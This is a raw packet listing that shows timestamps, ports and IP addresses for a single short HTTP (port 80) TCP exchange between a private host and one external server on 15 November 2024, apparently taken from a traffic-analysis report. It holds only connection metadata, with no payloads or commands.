Nov 15, 2024 10:29:00.111999989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112004995 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.112015963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112039089 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112050056 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112051010 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.112070084 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.112071037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112086058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112101078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112137079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.112168074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.112238884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112266064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112281084 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112334013 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.112349033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112365007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112381935 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.112433910 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.112433910 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.114466906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.114506006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.114516973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.114561081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.114613056 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.114613056 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.114737034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.114748001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.114789963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.119920015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.119930029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.120012045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.120026112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.120033979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.120084047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.121642113 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121710062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121721983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121731997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121750116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121762991 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121773005 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.121774912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121805906 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.121805906 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.121889114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.121917009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.122067928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.130623102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130635023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130645990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130656958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130667925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130678892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130759001 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.130793095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130796909 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.130816936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130829096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130853891 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.130882025 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.130917072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.130930901 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131083965 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131125927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131136894 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131175041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.131175041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.131177902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131191015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131299973 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.131436110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131447077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131458044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.131501913 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.131501913 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.138217926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.138256073 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.138268948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.138329029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.138339996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.138387918 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.157464981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157557011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157569885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157587051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157598972 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157614946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157627106 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157639027 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157649040 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.157758951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.157799006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157861948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157876015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157895088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157903910 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.157907963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.157948017 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158021927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158060074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158102036 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158113956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158133984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158144951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158179045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158184052 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158184052 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158282042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158296108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158308983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158320904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158334017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158349037 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158375978 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158375978 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158581018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158641100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158653021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158694983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158698082 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158709049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158900023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158921957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158925056 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.158935070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.158965111 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.159008026 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.159035921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.159096956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.159109116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.159147024 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.159147978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.159162998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.159203053 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.160742044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.160770893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.160782099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.160799980 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.160898924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.165829897 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.165872097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.165891886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.165904999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.165918112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.166024923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.166024923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.166043043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.166058064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.166069984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.166115999 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.166115999 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.167076111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167128086 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167148113 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167188883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167207003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167217016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.167221069 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167264938 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.167264938 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.167289019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167300940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167319059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.167345047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.169610977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.169629097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.169644117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.169698000 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.169795036 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.172030926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172064066 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172081947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172101974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172112942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172118902 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.172125101 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172178030 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.172178030 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.172221899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172235012 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172246933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172267914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172297955 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.172391891 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.172437906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172528982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172540903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172602892 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.172605038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172619104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.172667980 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.176724911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.176763058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.176776886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.176831007 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.176848888 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.178885937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.178919077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.178934097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.178952932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.178972960 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.178987026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.179024935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.179024935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.179043055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.179064035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.179069996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.179078102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.179090023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.179106951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.179240942 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.181319952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.181358099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.181406021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.181416035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.181452036 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.181452036 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.184405088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.184429884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.184441090 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.184459925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.184492111 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.184525013 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.187222004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.187238932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.187252045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.187316895 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.188426018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.188463926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.188476086 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.188488960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.188560963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.192682981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.192720890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.192739010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.192751884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.192764044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.192775011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.192795038 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.192848921 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.193089008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193154097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193166018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193196058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193203926 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.193207979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193222046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193276882 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.193276882 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.193310022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193490982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193500996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193511963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193523884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193536043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.193558931 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.193568945 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.193828106 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.196847916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.196862936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.196975946 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.197021008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.197119951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.197196960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.197588921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.197613001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.197725058 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.204077005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.204113960 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.204124928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.204179049 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.204190969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.204204082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.204215050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.204265118 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.204324961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219096899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219125032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219136953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219144106 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219212055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219224930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219253063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219264030 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.219264030 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.219274044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219288111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219299078 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.219299078 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.219300032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.219341993 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.228533983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228586912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228599072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228621960 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228632927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228677034 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.228701115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228713989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228759050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228763103 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.228763103 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.228771925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.228816032 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.229013920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229026079 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229044914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229057074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229068041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229068995 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.229083061 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229123116 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.229145050 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.229151964 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229235888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229247093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229259968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229273081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229285002 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.229307890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.229315042 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.229360104 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.231362104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.231388092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.231399059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.231410027 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.231425047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.231436014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.231508970 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.231616020 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.237040997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.237056971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.237140894 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.237164021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.237175941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.237217903 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.238785982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.238804102 CET	80	49762	150.241.95.163	192.168.2.10
